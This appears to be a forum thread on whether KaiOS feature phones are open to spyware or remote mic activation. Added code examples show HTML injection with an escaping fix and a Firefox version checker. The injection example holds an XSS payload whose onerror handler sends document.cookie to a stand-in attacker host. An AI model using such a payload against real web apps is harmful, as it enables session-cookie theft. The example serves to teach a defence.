Is KaiOS vulnerable to spyware/mic activation?

Hey everyone,
I’m looking into using a Nokia feature phone running KaiOS (like the Nokia 8000 4G) for better privacy. My main concern is whether this OS is vulnerable to advanced spyware (like Pegasus-style attacks), especially things like remote mic or camera activation.

Has there been any known exploitation of KaiOS for surveillance purposes? Should I be worried about a bad actor activating my mic remotely on one of these devices?

Appreciate any insights.

Nobody will be able to answer that. The thing about zero-days is that they are unknown.

If you believe you are a possible target for this, I would highly recommend you use GrapheneOS instead. There is no way that this rather unknown OS is going to be any safer.


What best practices would you take on GrapheneOS in this case, for example not downloading WhatsApp? Any others?

Any OS which has access to cameras/mics will inevitably enable malicious software to access those cameras/mics if compromised. Using ancient hardware with an insecure OS is not a reasonable approach to avoiding remote exploitation. All programs inevitably contain vulnerabilities, which is why you want something that is up to date with secure hardware, firmware, and software as well as modern exploit mitigations and good security practices like sandboxing.


Limiting apps and other features is always a good idea.


KaiOS 4.0 will be released soon and it’s based on Android 14.
So the security will be better. The Nokia 8000 seems to be based on KaiOS 2.5.

I would not trust that.

I would wait for the TCL Flip 4 5G with KaiOS 4.0.

Keep in mind, only the latest Android version has all the security fixes.

How is your comment related to the KaiOS operating system?

You said KaiOS version 4.0 will be based on Android 14, and Android 14 is already not receiving all the security fixes.

Android 13 and 14 are still receiving all the security fixes that apply to them.
KaiOS is a different OS, but I am not an expert on KaiOS.

Android 13 - 15 are still receiving updates, but Android 13 will end in around a year considering that Android 13 was released in August 2022.

Now this doesn’t mean that KaiOS will be secure if they don’t timely deliver their updates (like cough Fairphone cough)
also: [source]

  • Same APIs as KaiOS 3.0

take that for what you will in terms of security.
Also, there’s no Signal, not even WhatsApp or whatever, so why would you ever consider KaiOS in this state? Sure, the Android 14 base may or may not change this, but even then the security concerns, especially with maybe sideloading APKs, and the question of whether KaiOS will timely deliver security updates make it a no-go.


The mic alone on that phone, if it’s the “Banana”-looking phone, is pretty poor even on speakerphone.

If you’re concerned, then open up the phone and find the mic hole(s), not the speakers. Then obtain some superglue, baking soda and a superglue applicator adapter, put glue in the mic hole(s) and sprinkle baking soda in there.

Pro-tip: Baking soda makes superglue dry super hard and fast.

I would take a look at this link

Technical Advisory – Multiple HTML Injection Vulnerabilities in KaiOS Pre-installed Mobile Applications | NCC Group

From what I can tell of this OS, 3.0 and 3.1 had quite a few exploits that had the potential to be used to track and copy sensitive data.
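The advisory linked above concerns HTML injection in KaiOS's pre-installed web apps. The following is an added example written for this thread, not code from the advisory or from KaiOS: it shows the bug class in a web app that builds markup from an untrusted string by concatenation, next to the escaped version. The "contact name" field, the `renderContact*` function names and the sample payload are assumptions chosen for illustration.

```javascript
// Added example (not from the NCC Group advisory or KaiOS's own code):
// the HTML-injection bug class in a web app that renders untrusted text
// by string concatenation, beside the escaped version.
// The "contact name" source is a hypothetical field chosen for illustration.

// Vulnerable: untrusted text is spliced straight into markup, so a name
// containing a tag becomes live HTML (and its event handler becomes script).
function renderContactUnsafe(name) {
  return `<li class="contact">${name}</li>`;
}

// Minimal HTML escaping for text nodes and quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened: the same template, but the untrusted value is escaped first,
// so the browser renders the payload as literal text.
function renderContactSafe(name) {
  return `<li class="contact">${escapeHtml(name)}</li>`;
}

// Constructed sample input: an attacker-chosen contact name or sender string.
// The beacon URL is a placeholder, not a real host.
const ATTACKER_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Check used below and by the test: does the rendered markup still contain
// an unescaped tag that the HTML parser would treat as an element?
function containsActiveTag(html) {
  return /<(img|script|iframe|svg)\b/i.test(html);
}

function demo() {
  const unsafe = renderContactUnsafe(ATTACKER_NAME);
  const safe = renderContactSafe(ATTACKER_NAME);
  console.log("unsafe:", unsafe, "-> active tag:", containsActiveTag(unsafe));
  console.log("safe:  ", safe, "-> active tag:", containsActiveTag(safe));
  return { unsafe, safe };
}

demo();
```

Escaping fixes the text-node and quoted-attribute case shown here; when the value lands in a DOM, assigning it through `textContent` rather than `innerHTML` avoids the problem without any escaping, and a Content-Security-Policy that forbids inline handlers limits what an injected tag can do if one slips through.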

Theoretically it is possible, but it is more based on your threat model. If it is a government body, then they could go through the effort to do so. A normal bad actor seems unlikely, as there is not a high benefit given the smaller install base compared to other operating systems.

Is there any reason to use this particular OS? It seems like an “in between” version of a dumb and smartphone without providing what is great about either.

I am not understanding how this is better for privacy than other smartphones, since there tend to be built-in ads in the vendor-installed applications, there is no way to sandbox anything, and the apps seem to have elevated access and can communicate with each other.

KaiOS seems to be selling you the illusion of security and privacy but when analyzed provides no hardening against exploitation or surveillance. Especially when phones rarely receive updates (none in several cases) leaving a large concern for security.

KaiOS is based on web apps and runs Gecko. If there is a browser, try going into about:support to see the Firefox version. It should be either 128.X ESR or 138.

If above doesn’t work, try going into the browser settings to get the version.

If the browser is up to date, that is a sign that they care about security (not a silver bullet though).
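To make the check above repeatable, here is an added example (not part of the original post) that parses the version string about:support or the user-agent header reports and compares it with the two release lines the post names, 128 ESR and 138. Those two numbers come from the post and will go stale; the `FIREFOX_LINES_FROM_POST` table, the function names and the sample strings are assumptions constructed for illustration, not data from any particular KaiOS device.

```javascript
// Added example (not part of the original post): parse the Firefox/Gecko
// version reported by about:support or a user-agent string, and classify it
// against the release lines the post names. The table below is taken from
// the post (128 ESR / 138) and must be updated as Mozilla ships new lines.
const FIREFOX_LINES_FROM_POST = { esr: 128, release: 138 };

// Accepts a full UA string ("... Gecko/128.0 Firefox/128.3.0"), an "rv:"
// token, or a bare version as about:support shows it ("128.3.0esr").
// Returns { major, minor, patch, esr } or null if nothing parses.
function parseGeckoVersion(text) {
  const s = String(text);
  const patterns = [
    /Firefox\/(\d+)\.(\d+)(?:\.(\d+))?(esr)?/i, // UA "Firefox/x.y[.z]"
    /\brv:(\d+)\.(\d+)(?:\.(\d+))?/i,          // UA "rv:x.y[.z]"
    /^\s*(\d+)\.(\d+)(?:\.(\d+))?\s*(esr)?\s*$/i, // bare "x.y[.z][esr]"
  ];
  for (const re of patterns) {
    const m = re.exec(s);
    if (m) {
      return {
        major: Number(m[1]),
        minor: Number(m[2]),
        patch: m[3] === undefined ? 0 : Number(m[3]),
        esr: Boolean(m[4]),
      };
    }
  }
  return null;
}

// Classify a parsed version against the known lines. Only the major number
// decides the line; whether the point release is the latest one on that
// line needs Mozilla's release notes, which this example does not fetch.
function classifyGecko(version, lines = FIREFOX_LINES_FROM_POST) {
  if (!version) return "unparseable";
  if (version.major === lines.release) return "current release line";
  if (version.major === lines.esr) return "current ESR line";
  if (version.major > lines.release) return "newer than the post's table; update the table";
  return `outdated (major ${version.major}; known lines are ${lines.esr} ESR / ${lines.release})`;
}

// Constructed sample inputs, in the shapes a reader would paste in.
const SAMPLES = [
  "Mozilla/5.0 (Mobile; rv:48.0) Gecko/48.0 Firefox/48.0",
  "128.3.0esr",
  "Mozilla/5.0 (Android 14; Mobile; rv:138.0) Gecko/138.0 Firefox/138.0",
  "no version here",
];

function report(samples = SAMPLES) {
  return samples.map((s) => {
    const v = parseGeckoVersion(s);
    const verdict = classifyGecko(v);
    console.log(`${s}\n  -> ${verdict}`);
    return verdict;
  });
}

report();
```

The classification is deliberately coarse: being on the 128 line says nothing about whether the 128.x point release is the latest one, and an OS vendor can ship a current Gecko while leaving the rest of the system (kernel, baseband, vendor apps) unpatched, which is the "not a silver bullet" caveat in the post.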